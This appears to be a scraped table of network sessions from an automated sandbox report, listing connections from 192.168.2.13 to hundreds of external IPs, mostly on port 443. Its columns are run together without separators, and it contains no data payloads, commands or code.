                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15168192.168.2.1358860169.41.34.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15169192.168.2.1347252120.23.221.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15170192.168.2.1353748102.233.166.244443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15171192.168.2.1343746192.114.16.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15172192.168.2.133377043.139.33.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15173192.168.2.1346334129.240.189.170443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15174192.168.2.135905677.203.247.58443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15175192.168.2.133796684.187.170.31443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15176192.168.2.1337840195.189.95.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15177192.168.2.1350856145.52.132.213443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15178192.168.2.1359212223.43.79.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15179192.168.2.1347722105.97.41.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15180192.168.2.1340208213.136.138.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15181192.168.2.1333748188.65.236.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15182192.168.2.1335922142.156.34.179443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15183192.168.2.134133694.155.182.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15184192.168.2.133857677.115.120.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15185192.168.2.1353848165.247.18.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15186192.168.2.135670686.107.220.175443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15187192.168.2.1339246145.44.161.104443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15188192.168.2.1341008110.152.15.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15189192.168.2.135931676.1.245.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15190192.168.2.1352174192.204.19.252443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15191192.168.2.1357102169.95.135.150443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15192192.168.2.1334398176.208.180.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15193192.168.2.1338898206.187.234.122443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15194192.168.2.1340538100.134.185.25443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15195192.168.2.133895457.133.166.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15196192.168.2.133652899.90.154.118443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15197192.168.2.1349812210.135.182.90443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15198192.168.2.135707698.190.252.134443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15199192.168.2.135939060.243.112.224443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15200192.168.2.1353194165.168.232.145443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15201192.168.2.135947046.175.34.36443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15202192.168.2.1334616223.60.21.80443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15203192.168.2.1357998189.68.93.27443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15204192.168.2.134343435.7.117.182443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15205192.168.2.1336642120.69.58.197443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15206192.168.2.1352492171.100.78.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15207192.168.2.1335344111.63.148.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15208192.168.2.135156689.221.155.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15209192.168.2.135007235.0.188.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15210192.168.2.1347470124.225.22.61443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15211192.168.2.1342308155.200.54.84443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15212192.168.2.1339346106.81.253.7443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15213192.168.2.134091013.163.239.53443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15214192.168.2.1336416131.72.247.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15215192.168.2.133663423.83.49.2443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15216192.168.2.134380839.138.174.133443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15217192.168.2.135871013.19.12.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15218192.168.2.1340526181.171.52.134443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15219192.168.2.1358924165.181.141.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15220192.168.2.136054454.103.183.87443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15221192.168.2.133694835.150.163.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15222192.168.2.136031250.64.129.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15223192.168.2.1350584169.194.184.164443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15224192.168.2.1334734135.15.8.18443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15225192.168.2.1355432210.54.154.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15226192.168.2.134303086.102.0.121443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15227192.168.2.135952452.81.159.157443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15228192.168.2.134825412.142.222.40443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15229192.168.2.1336596143.163.116.243443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15230192.168.2.1351354172.160.189.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15231192.168.2.133643045.153.184.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15232192.168.2.1347252145.187.174.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15233192.168.2.133942661.61.212.126443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15234192.168.2.1339416126.190.66.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15235192.168.2.134644214.108.232.51443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15236192.168.2.135180843.111.163.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15237192.168.2.134985062.176.241.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15238192.168.2.135976292.172.205.98443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15239192.168.2.1339570106.99.10.153443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15240192.168.2.134812053.242.27.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15241192.168.2.133967851.90.62.154443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15242192.168.2.134772879.93.149.247443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15243192.168.2.1345268107.231.153.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15244192.168.2.134294280.208.247.225443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15245192.168.2.1354046179.67.169.32443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15246192.168.2.134968058.82.2.166443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15247192.168.2.1356970200.55.59.111443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15248192.168.2.1350166121.85.53.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15249192.168.2.134538863.113.4.143443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15250192.168.2.135992650.121.61.222443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15251192.168.2.1343930131.83.254.19443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15252192.168.2.1348450141.64.178.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15253192.168.2.13476628.136.173.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15254192.168.2.133559061.171.21.6443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15255192.168.2.1348362110.185.137.132443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15256192.168.2.1344862122.96.94.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15257192.168.2.133952085.190.75.73443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15258192.168.2.1338420122.183.161.220443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15259192.168.2.1351492197.245.94.6443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15260192.168.2.1350020201.81.233.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15261192.168.2.1334900134.192.85.226443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15262192.168.2.1334062124.82.115.17443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15263192.168.2.134670024.92.136.233443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15264192.168.2.1352186218.134.87.163443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15265192.168.2.1345868204.192.120.42443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15266192.168.2.1347712207.180.166.161443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15267192.168.2.1345630161.190.176.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15268192.168.2.1354126142.239.13.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15269192.168.2.1352198106.113.226.251443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15270192.168.2.1354432164.75.120.228443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15271192.168.2.133738069.26.133.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15272192.168.2.133892054.209.32.214443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15273192.168.2.134667671.202.156.206443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15274192.168.2.134923025.77.222.236443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15275192.168.2.1349152114.218.65.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15276192.168.2.1360176101.142.153.210443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15277192.168.2.1338298185.207.150.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15278192.168.2.1342886103.244.39.123443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15279192.168.2.1345254140.192.65.107443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15280192.168.2.1357548124.166.27.14443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15281192.168.2.1338114199.136.200.62443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15282192.168.2.135613071.118.42.131443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15283192.168.2.1355890141.200.1.119443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15284192.168.2.1356740149.66.252.127443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15285192.168.2.1338972162.248.95.120443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15286192.168.2.134690414.23.54.169443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15287192.168.2.133741665.208.108.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15288192.168.2.134927054.56.253.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15289192.168.2.1352354107.135.17.186443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15290192.168.2.1343056115.235.204.158443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15291192.168.2.1338864139.196.77.112443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15292192.168.2.133865441.187.22.63443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15293192.168.2.134748459.140.103.218443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15294192.168.2.1340876104.18.89.1678080
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15295192.168.2.1347370104.25.60.2498080
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15296192.168.2.1351904194.158.67.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15297192.168.2.1336968213.189.102.10443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15298192.168.2.135601292.230.107.95443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15299192.168.2.134955261.230.177.114443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15300192.168.2.1335378117.37.54.184443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15301192.168.2.135825492.170.161.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15302192.168.2.1353072176.222.72.238443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15303192.168.2.1359554155.166.228.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15304192.168.2.134306227.24.103.45443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15305192.168.2.1359680154.243.97.155443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15306192.168.2.1336918198.0.188.60443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15307192.168.2.1360198133.78.108.128443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15308192.168.2.1359726185.216.96.245443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15309192.168.2.1355372173.60.173.208443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15310192.168.2.133983274.102.188.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15311192.168.2.134485689.137.200.172443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15312192.168.2.1333260213.233.200.44443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15313192.168.2.133588645.223.106.115443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15314192.168.2.133602223.11.61.78443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15315192.168.2.135863086.126.118.52443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15316192.168.2.133944647.216.14.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15317192.168.2.1352446132.44.84.203443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15318192.168.2.134297457.65.148.8443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15319192.168.2.1344838110.82.155.104443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15320192.168.2.1352168144.27.18.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15321192.168.2.134061689.127.102.28443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15322192.168.2.1360012111.78.81.219443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15323192.168.2.1344652211.67.98.79443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15324192.168.2.1347456145.204.236.193443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15325192.168.2.1353420174.133.25.113443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15326192.168.2.1340490131.179.49.5443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15327192.168.2.1336592105.3.93.69443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15328192.168.2.134070861.95.149.231443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15329192.168.2.1341324197.127.238.194443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15330192.168.2.135034618.105.106.44443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15331192.168.2.1346134180.210.223.217443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15332192.168.2.1338094171.241.97.9443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15333192.168.2.134572813.99.231.152443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15334192.168.2.1351582169.1.91.234443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15335192.168.2.1343450179.12.132.33443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15336192.168.2.13344504.218.150.212443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15337192.168.2.1358614177.27.110.141443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15338192.168.2.134750451.193.208.11443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15339192.168.2.13570102.232.196.249443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15340192.168.2.134752014.77.118.158443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15341192.168.2.135984882.32.157.135443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15342192.168.2.1347594151.47.167.50443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15343192.168.2.1349852206.212.193.240443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15344192.168.2.1337680119.48.251.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15345192.168.2.135564838.133.167.96443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15346192.168.2.1344002115.173.72.221443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15347192.168.2.134162497.151.214.94443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15348192.168.2.1359522223.195.152.225443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15349192.168.2.1342780165.167.145.198443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15350192.168.2.133430271.16.128.242443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15351192.168.2.133876459.133.29.218443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15352192.168.2.1336738190.75.22.85443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15353192.168.2.133385412.172.114.187443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15354192.168.2.1338364162.28.5.200443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15355192.168.2.134144441.225.228.237443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15356192.168.2.1352384188.155.103.109443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15357192.168.2.1334088152.253.163.180443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15358192.168.2.134332469.140.166.165443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15359192.168.2.135894239.104.177.6443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15360192.168.2.1336858158.21.30.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15361192.168.2.135060242.4.175.4443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15362192.168.2.1354384199.157.0.129443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15363192.168.2.1343974118.159.169.66443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15364192.168.2.1344908115.225.176.100443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15365192.168.2.134621696.243.126.18443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15366192.168.2.13524964.166.157.159443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15367192.168.2.1348838193.20.239.140443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15368192.168.2.134793218.254.101.34443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15369192.168.2.133374060.64.177.167443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15370192.168.2.1351744151.9.66.138443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15371192.168.2.135114474.96.61.130443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15372192.168.2.133690082.94.75.156443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15373192.168.2.1360146191.47.205.57443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15374192.168.2.1351432175.47.185.6443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15375192.168.2.1349024196.198.88.188443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15376192.168.2.135298465.38.184.59443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15377192.168.2.135650065.72.220.76443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15378192.168.2.1333034178.1.197.185443
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  15379192.168.2.1347762164.171.117.227443
                                                  TimestampBytes transferredDirectionData


